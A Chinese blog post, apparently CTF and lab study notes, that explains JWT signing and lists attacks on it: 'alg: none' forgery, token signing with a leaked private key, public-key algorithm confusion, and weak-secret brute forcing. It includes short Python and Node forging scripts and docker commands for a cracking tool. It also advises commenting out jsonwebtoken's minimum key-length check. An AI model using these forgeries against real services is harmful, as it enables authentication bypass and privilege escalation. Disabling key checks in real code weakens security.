JWT (JSON Web Token)

于 2024-07-30 06:30:00 发布
阅读量227 收藏 2
点赞数 5
分类专栏: # owasp top10 # CTF+靶场 文章标签: json 网络 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140781063
版权

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做技术交流与分享...

目录

JWT介绍

漏洞点:

当不校验算法时-->替换算法/使用空的算法,达到数据篡改目的

1 私钥泄露

2 公钥泄露

 

 总结加密方式:

总结jwt攻击:

 

JWT脚本.py:

JWT 爆破工具地址

调试报错

JWT介绍

JWT:
jwt是一个轻量级的认证规范 --对数据进行签名用的.
cookie放到客户端 可以随便改,
--防止数据被篡改

1 对数据进行加密   内容对用户敏感,不需要对外
2 对数据进行签名   内容不敏感,但是确保不被篡改

JWT是对数据进行签名,防止数据篡改,而不是防止数据被读取 (看到,不能改)

JSON Web Token (JWT)

?username=admin&score=100      #别人传递过程中,会对积分进行篡改 
?username=admin&score=100&token=c17961f5f372f8cf039113909d715943
? md5(score=100&username=admin)=c17961f5f372f8cf039113909d715943
?score=100&username=admin&token=c17961f5f372f8cf039113909d715943

篡改数据的同时,破解了算法,篡改了签名

加盐机制,salt --->
md5(score=100&username=admin_ctfshow)=20f3fa445b286df3f1a518fcbcd8bbe2

盐值有可能被爆破,也有可能被泄露

增加更高的密码算法,不再简单的md5,盐值也大幅度提高长度,达到几百上千位 来保证我们的数据不被篡改  或者即使篡改了我们能发现.

 

漏洞点:

当不校验算法时-->替换算法/使用空的算法,达到数据篡改目的

不校验 headers
{
    "alg" : "None",   //算法 空
    "typ" : "jwt"
}
{
    "user" : "Admin"
}


{"alg":"None","typ":"JWT"}
{"iss":"admin","iat":1673703091,"exp":1673710291,"nbf":1673703091,"sub":"admin","jti":"21a3d6eec9efbc030983fbc3650c0f03"}

ewogICAgImFsZyIgOiAiTm9uZSIsCiAgICAidHlwIiA6ICJqd3QiCn0=.ewogICAgInVzZXIiIDogImFkbWluIgp9

1 私钥泄露

通过泄露的私钥,本地生成一个新的JWT验证字符串,绕过
1 私钥泄露
可以根据私钥生成任意的jwt字符串

const jwt = require('jsonwebtoken');
const fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

验签

2 公钥泄露

 

可以根据公钥,修改算法从非对称算法 到 对称密钥算法  
双方都使用公钥验签,顺利篡改数据
当公钥可以拿到时,如果使用对称密码,则对面使用相同的公钥进行解密
实现验签通过

3密码弱可以爆破

 

 总结加密方式:

1 非对称加密算法  私钥  公钥   (成对出现)只要两个是匹配的, 一个私钥加密的文件,用公钥都能解开(验签)
2 对称加密算法   暗号 口令  公钥

总结jwt攻击:

1 空密码算法绕过 不验证算法的前提下
2 弱密码绕过   猜测弱密码
3 密码爆破   安装docker 执行jwtcracker
4 私钥泄露  直接利用私钥生成正确jwt字符串 过验签
5 公钥泄露  不验证算法前提下,修改算法为对称加密,通过公钥重新生成对称签名的字符串 实现验签通过

 

JWT脚本.py:

import time
import jwt
# payload
token_dict = {
  "iss": "admin",
  "iat": 1610432484,
  "exp": 1610439684,
  "nbf": 1610432484,
  "sub": "admin",
  "jti": "efec0205f601a537847ee2dd3ffa81ff"
}

# headers
headers = {
  "alg": "none",
  "typ": "JWT"
}
jwt_token = jwt.encode(token_dict,  # payload, 有效载体 
					 key='',
                       headers=headers,  # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
 					   algorithm="none",  # 指明签名算法方式, 默认也是HS256
                       ).decode('ascii')  # python3 编码后得到 bytes, 再进行解码(指明解码的格式), 得到一个str

print(jwt_token)

JWT 爆破工具地址

GitHub - brendan-rius/c-jwt-cracker: JWT brute force cracker written in C

基于docker  

docker build . -t jwtcrack
docker run -it --rm  jwtcrack 
要爆破的签名:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE

node安装jwt命令:  npm install jsonwebtoken  #安装完成之后会生成目录(依赖)
--save  //表示全局安装
jsonwebtoken版本问题

调试报错

版本15后,最小密钥2048
node_moudle/jsonwebtoken/sign.js
--将报错的地方注释掉. (不建议做法)
-->成功生成
 

金灰
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JWT(json web token)包
01-22
JWT(json web token)是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准。 JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。比如用在用户登录上...
php实现JWT(json web token)鉴权实例详解
01-03
JWTjson web token缩写。它将用户信息加密到token里,服务器不保存任何用户信息。服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证。基于token的身份验证可以替代传统的cookie+session身份验证方法...
JWTJson Web Token
每天学习一点点,成长一小步
09-17 431
JWT 产生背景 客户端通过调用服务端的接口,访问服务端业务数据,但是,一般的数据并非所有的用户都有权限去访问。因此,为了保证数据的安全性,在访问者访问数据时需要验证此次请求是否有足够的权限去访问此数据,也就是对访问者进行鉴权。 由于HTTP协议是无状态的,也就是说,如果我们已经认证了一个用户,那么他下一次请求的时候,服务器不知道我是谁,所以这就导致我们必须再次认证。 为了解决以上问题,目前有两种方式,如下: 基于服务器的身份认证 基于Token的身份认证 1.1 传统基于服务的认证方式 传统的做法是将已经
JWTJSON Web Token
weixin_63541561的博客
03-27 1069
是一种开放标准,用于在网络上安全传输信息的简洁、自包含的方式。它通常被用于身份验证和授权机制。JWT 由三部分组成:头部(Header)、载荷(Payload)和签名(Signature)。总结来说,使用 JWT 相较于传统的基于会话的认证机制,可以减少服务器存储开销和管理复杂性,实现跨域支持和水平扩展,并且更适应无状态和微服务架构。前端:存储在浏览器的。
JWT JSON Web Token 阮一峰老师
weixin_43065507的博客
08-06 1123
http://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html 记录一下JWT课程
JWT json web token
qq1195566313的博客
06-25 2177
当接收到请求时,从请求头中获取存储的 JWT(通过 req.headers.authorization),并使用 jsonwebtoken 的 verify 方法验证 JWT 的有效性。如果匹配,则返回登录成功的 JSON 响应,并使用 jsonwebtoken 的 sign 方法生成一个 JWT,其中包含用户的 ID 信息,并设置了过期时间为 24 小时。这段代码实现了基本的用户登录验证和通过 JWT 鉴权的接口,在登录成功后生成的 JWT 中包含了用户的 ID 信息,从而在后续请求中进行验证和授权。
JWT Json web token
SasukeN的博客
07-02 296
JWT     Json web token适用于分布式站点的点击登陆 SSO 场景JWT的构成第一部分我们称它为头部(header ),第二部分我们称其为载荷(payload ),第三部分是签证(signature ).Header    base64加密jwt的头部承载两部分信息:声明类型,这里是jwt声明加密的算法 通常直接使用 HMAC SHA256Playload    base64加密...
JWT-JSON Web Token實作分享1
08-08
JSON Web TokenJWT)是一种基于 token 的身份验证机制,它可以提供一种无状态、可扩展、安全的身份验证方式。下面将详细介绍 JWT 的实现和使用。 为什么需要 Web Token? 在服务器端身份验证中,传统的基于...
JWT(json web token加密算法) for C# dll 文件,亲测可用
07-02
JSON Web TokenJWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个JSON对象。这个信息可以被验证和信任,因为它是数字签名的。JWT可用于身份验证、授权,以及...
Cannot find module ‘html-webpack-plugin
qq_43071699的博客
07-26 417
安装。在Webpack配置文件中正确引用。清除缓存并重新安装依赖(如果需要)。确保Webpack版本与兼容。检查文件。按照这些步骤操作,你应该能够解决的问题。如果问题仍然存在,请提供更多信息,以便进一步诊断。
Hutool——发送http请求案例
专注写bug
07-29 399
在实际开发过程中,微服务环境下往往采取openfeign实现服务与服务之间的请求调用。但有时候需要调用第三方API的情况,虽然在spring boot 框架中提供了请求模板,但这个不怎么好用。市面上支持http调用的框架技术很多,比如okhttp等。本篇文章重点说明Hutool给我们封装的请求方法类。/*** 调用post 接口发送get请求* @return。
深入解析 Jackson 的 @JsonProperty 注解
一起coding,一起嗨。
07-29 260
深入解析 Jackson 的 @JsonProperty 注解
PyCharm 常用 的插件
u013934107的博客
07-27 192
PyCharm 常用 的插件
微信小程序教程002:代码结构介绍和新建小程序页面
WwLK123的博客
07-29 521
pages:小程序所有页面utils:存放工具性质的模块app.js:小程序项目的入口文件==(至关重要)==app.json:小程序项目的全局配置文件app.wxss:小程序项目的全局样式文件:项目的配置文件:用来配置小程序及其页面是否允许被微信索引WXML(WeiXin Markup Language)是小程序框架设计的一套标签语言,用来构建小程序页面的结构,其作用类似于网页开发中的HTML。WXML和HTML的区别标签名称不同属性节点不同。
YOLO入门教程(一)——训练自己的模型【含教程源码 + 故障排查】
吾门的博客
07-29 554
如何训练自己的YOLO模型,LabelMe多边形标注的标签如何训练。
Java的@DateTimeFormat注解与@JsonFormat注解的使用对比
訾博(ZiBo)的博客
07-27 680
在Spring和Jackson框架中,日期和时间格式化是一个常见需求。注解主要用于Spring的表单绑定,而注解则用于Jackson的JSON序列化和反序列化。了解这两个注解的使用场景和方法,可以帮助开发者更高效地处理日期和时间。和是处理日期和时间格式化的两个重要注解。主要用于Spring MVC的请求参数绑定,而主要用于Jackson的JSON序列化和反序列化。了解它们的使用场景和功能,可以帮助开发者更高效地处理日期和时间格式化需求。通过本文的介绍,希望读者能够更清晰地理解和。
js 替换json中的转义字符 \
qq_31683775的博客
07-27 134
在控制台测试,字符串先赋给变量,还是直接调用replace方法的结果又不同。正则表达式 /\\\\/g 和 /\//g 按理说也匹配到每个 \。其中 /\\/g 正则表达式 会选中 所有 \。但是在工具中测试,总会保留一个 \。
运营商二要素核验在生活中的作用
lupai的博客
07-25 516
运营商二要素核验在生活中扮演着至关重要的角色,它主要通过验证用户提交的手机号码和姓名(或身份证信息,但在此处主要讨论手机号码和姓名的验证)来确认用户身份的真实性。信息安全:二要素核验过程中,仅收集和核验关键信息(手机号码和姓名),不存储和泄露用户的更多个人隐私数据,从而保护用户的个人信息安全。金融安全:在互联网金融、银行等领域,进行开户、提现、大额交易等操作时,二要素核验能够确保交易双方身份的真实性,降低欺诈风险。红色部分代表参数值,appid默认为1,请修改为自己的appid值,去我的应用查看以及密钥。
微信小程序开发 快速学习 这篇就够了
最新发布
制定持续可量化的目标,不断坚持。
07-29 686
微信小程序开发 快速学习 这篇就够了
JSON Web Token简单案例
05-25
好的,下面是一个简单的基于 JSON Web TokenJWT)的身份验证案例: 1. 安装所需的库 ``` pip install pyjwt ``` 2. 生成JWT Token ```python import jwt import datetime # 定义过期时间 expire_time = datetime.datetime.utcnow() + datetime.timedelta(minutes=30) # 定义payload payload = { 'user_id': '123456', 'username': 'john', 'exp': expire_time } # 生成token jwt_token = jwt.encode(payload, 'secret_key', algorithm='HS256') print(jwt_token) ``` 上述代码中,我们使用了 pyjwt 库来生成 JWT Token。它的 encode() 方法接收三个参数:payload、密钥和算法。payload 是一个字典,包含我们想要在 Token 中存储的信息,例如用户ID、用户名、过期时间等等。密钥是一个字符串,用于加密 Token。算法是指用于加密 Token 的算法,这里我们选择了 HS256。 3. 验证JWT Token ```python import jwt # 定义Token jwt_token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoiMTIzNDU2IiwidXNlcm5hbWUiOiJqb2huIiwiZXhwIjoxNjMxMzEwMDUzfQ.XsDEjcd7jH8qC-6pZlWjZaFvDz-pT8NvQYrWb8I3-5c' # 验证Token try: decoded_token = jwt.decode(jwt_token, 'secret_key', algorithms=['HS256']) print(decoded_token) except jwt.ExpiredSignatureError: print('Token已过期') except jwt.InvalidTokenError: print('无效的Token') ``` 上述代码中,我们使用了 pyjwt 库的 decode() 方法来验证 Token。它接收三个参数:Token、密钥和算法。如果 Token 有效,则返回包含信息的字典。如果 Token 过期或无效,则会引发 jwt.ExpiredSignatureError 或 jwt.InvalidTokenError 异常。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值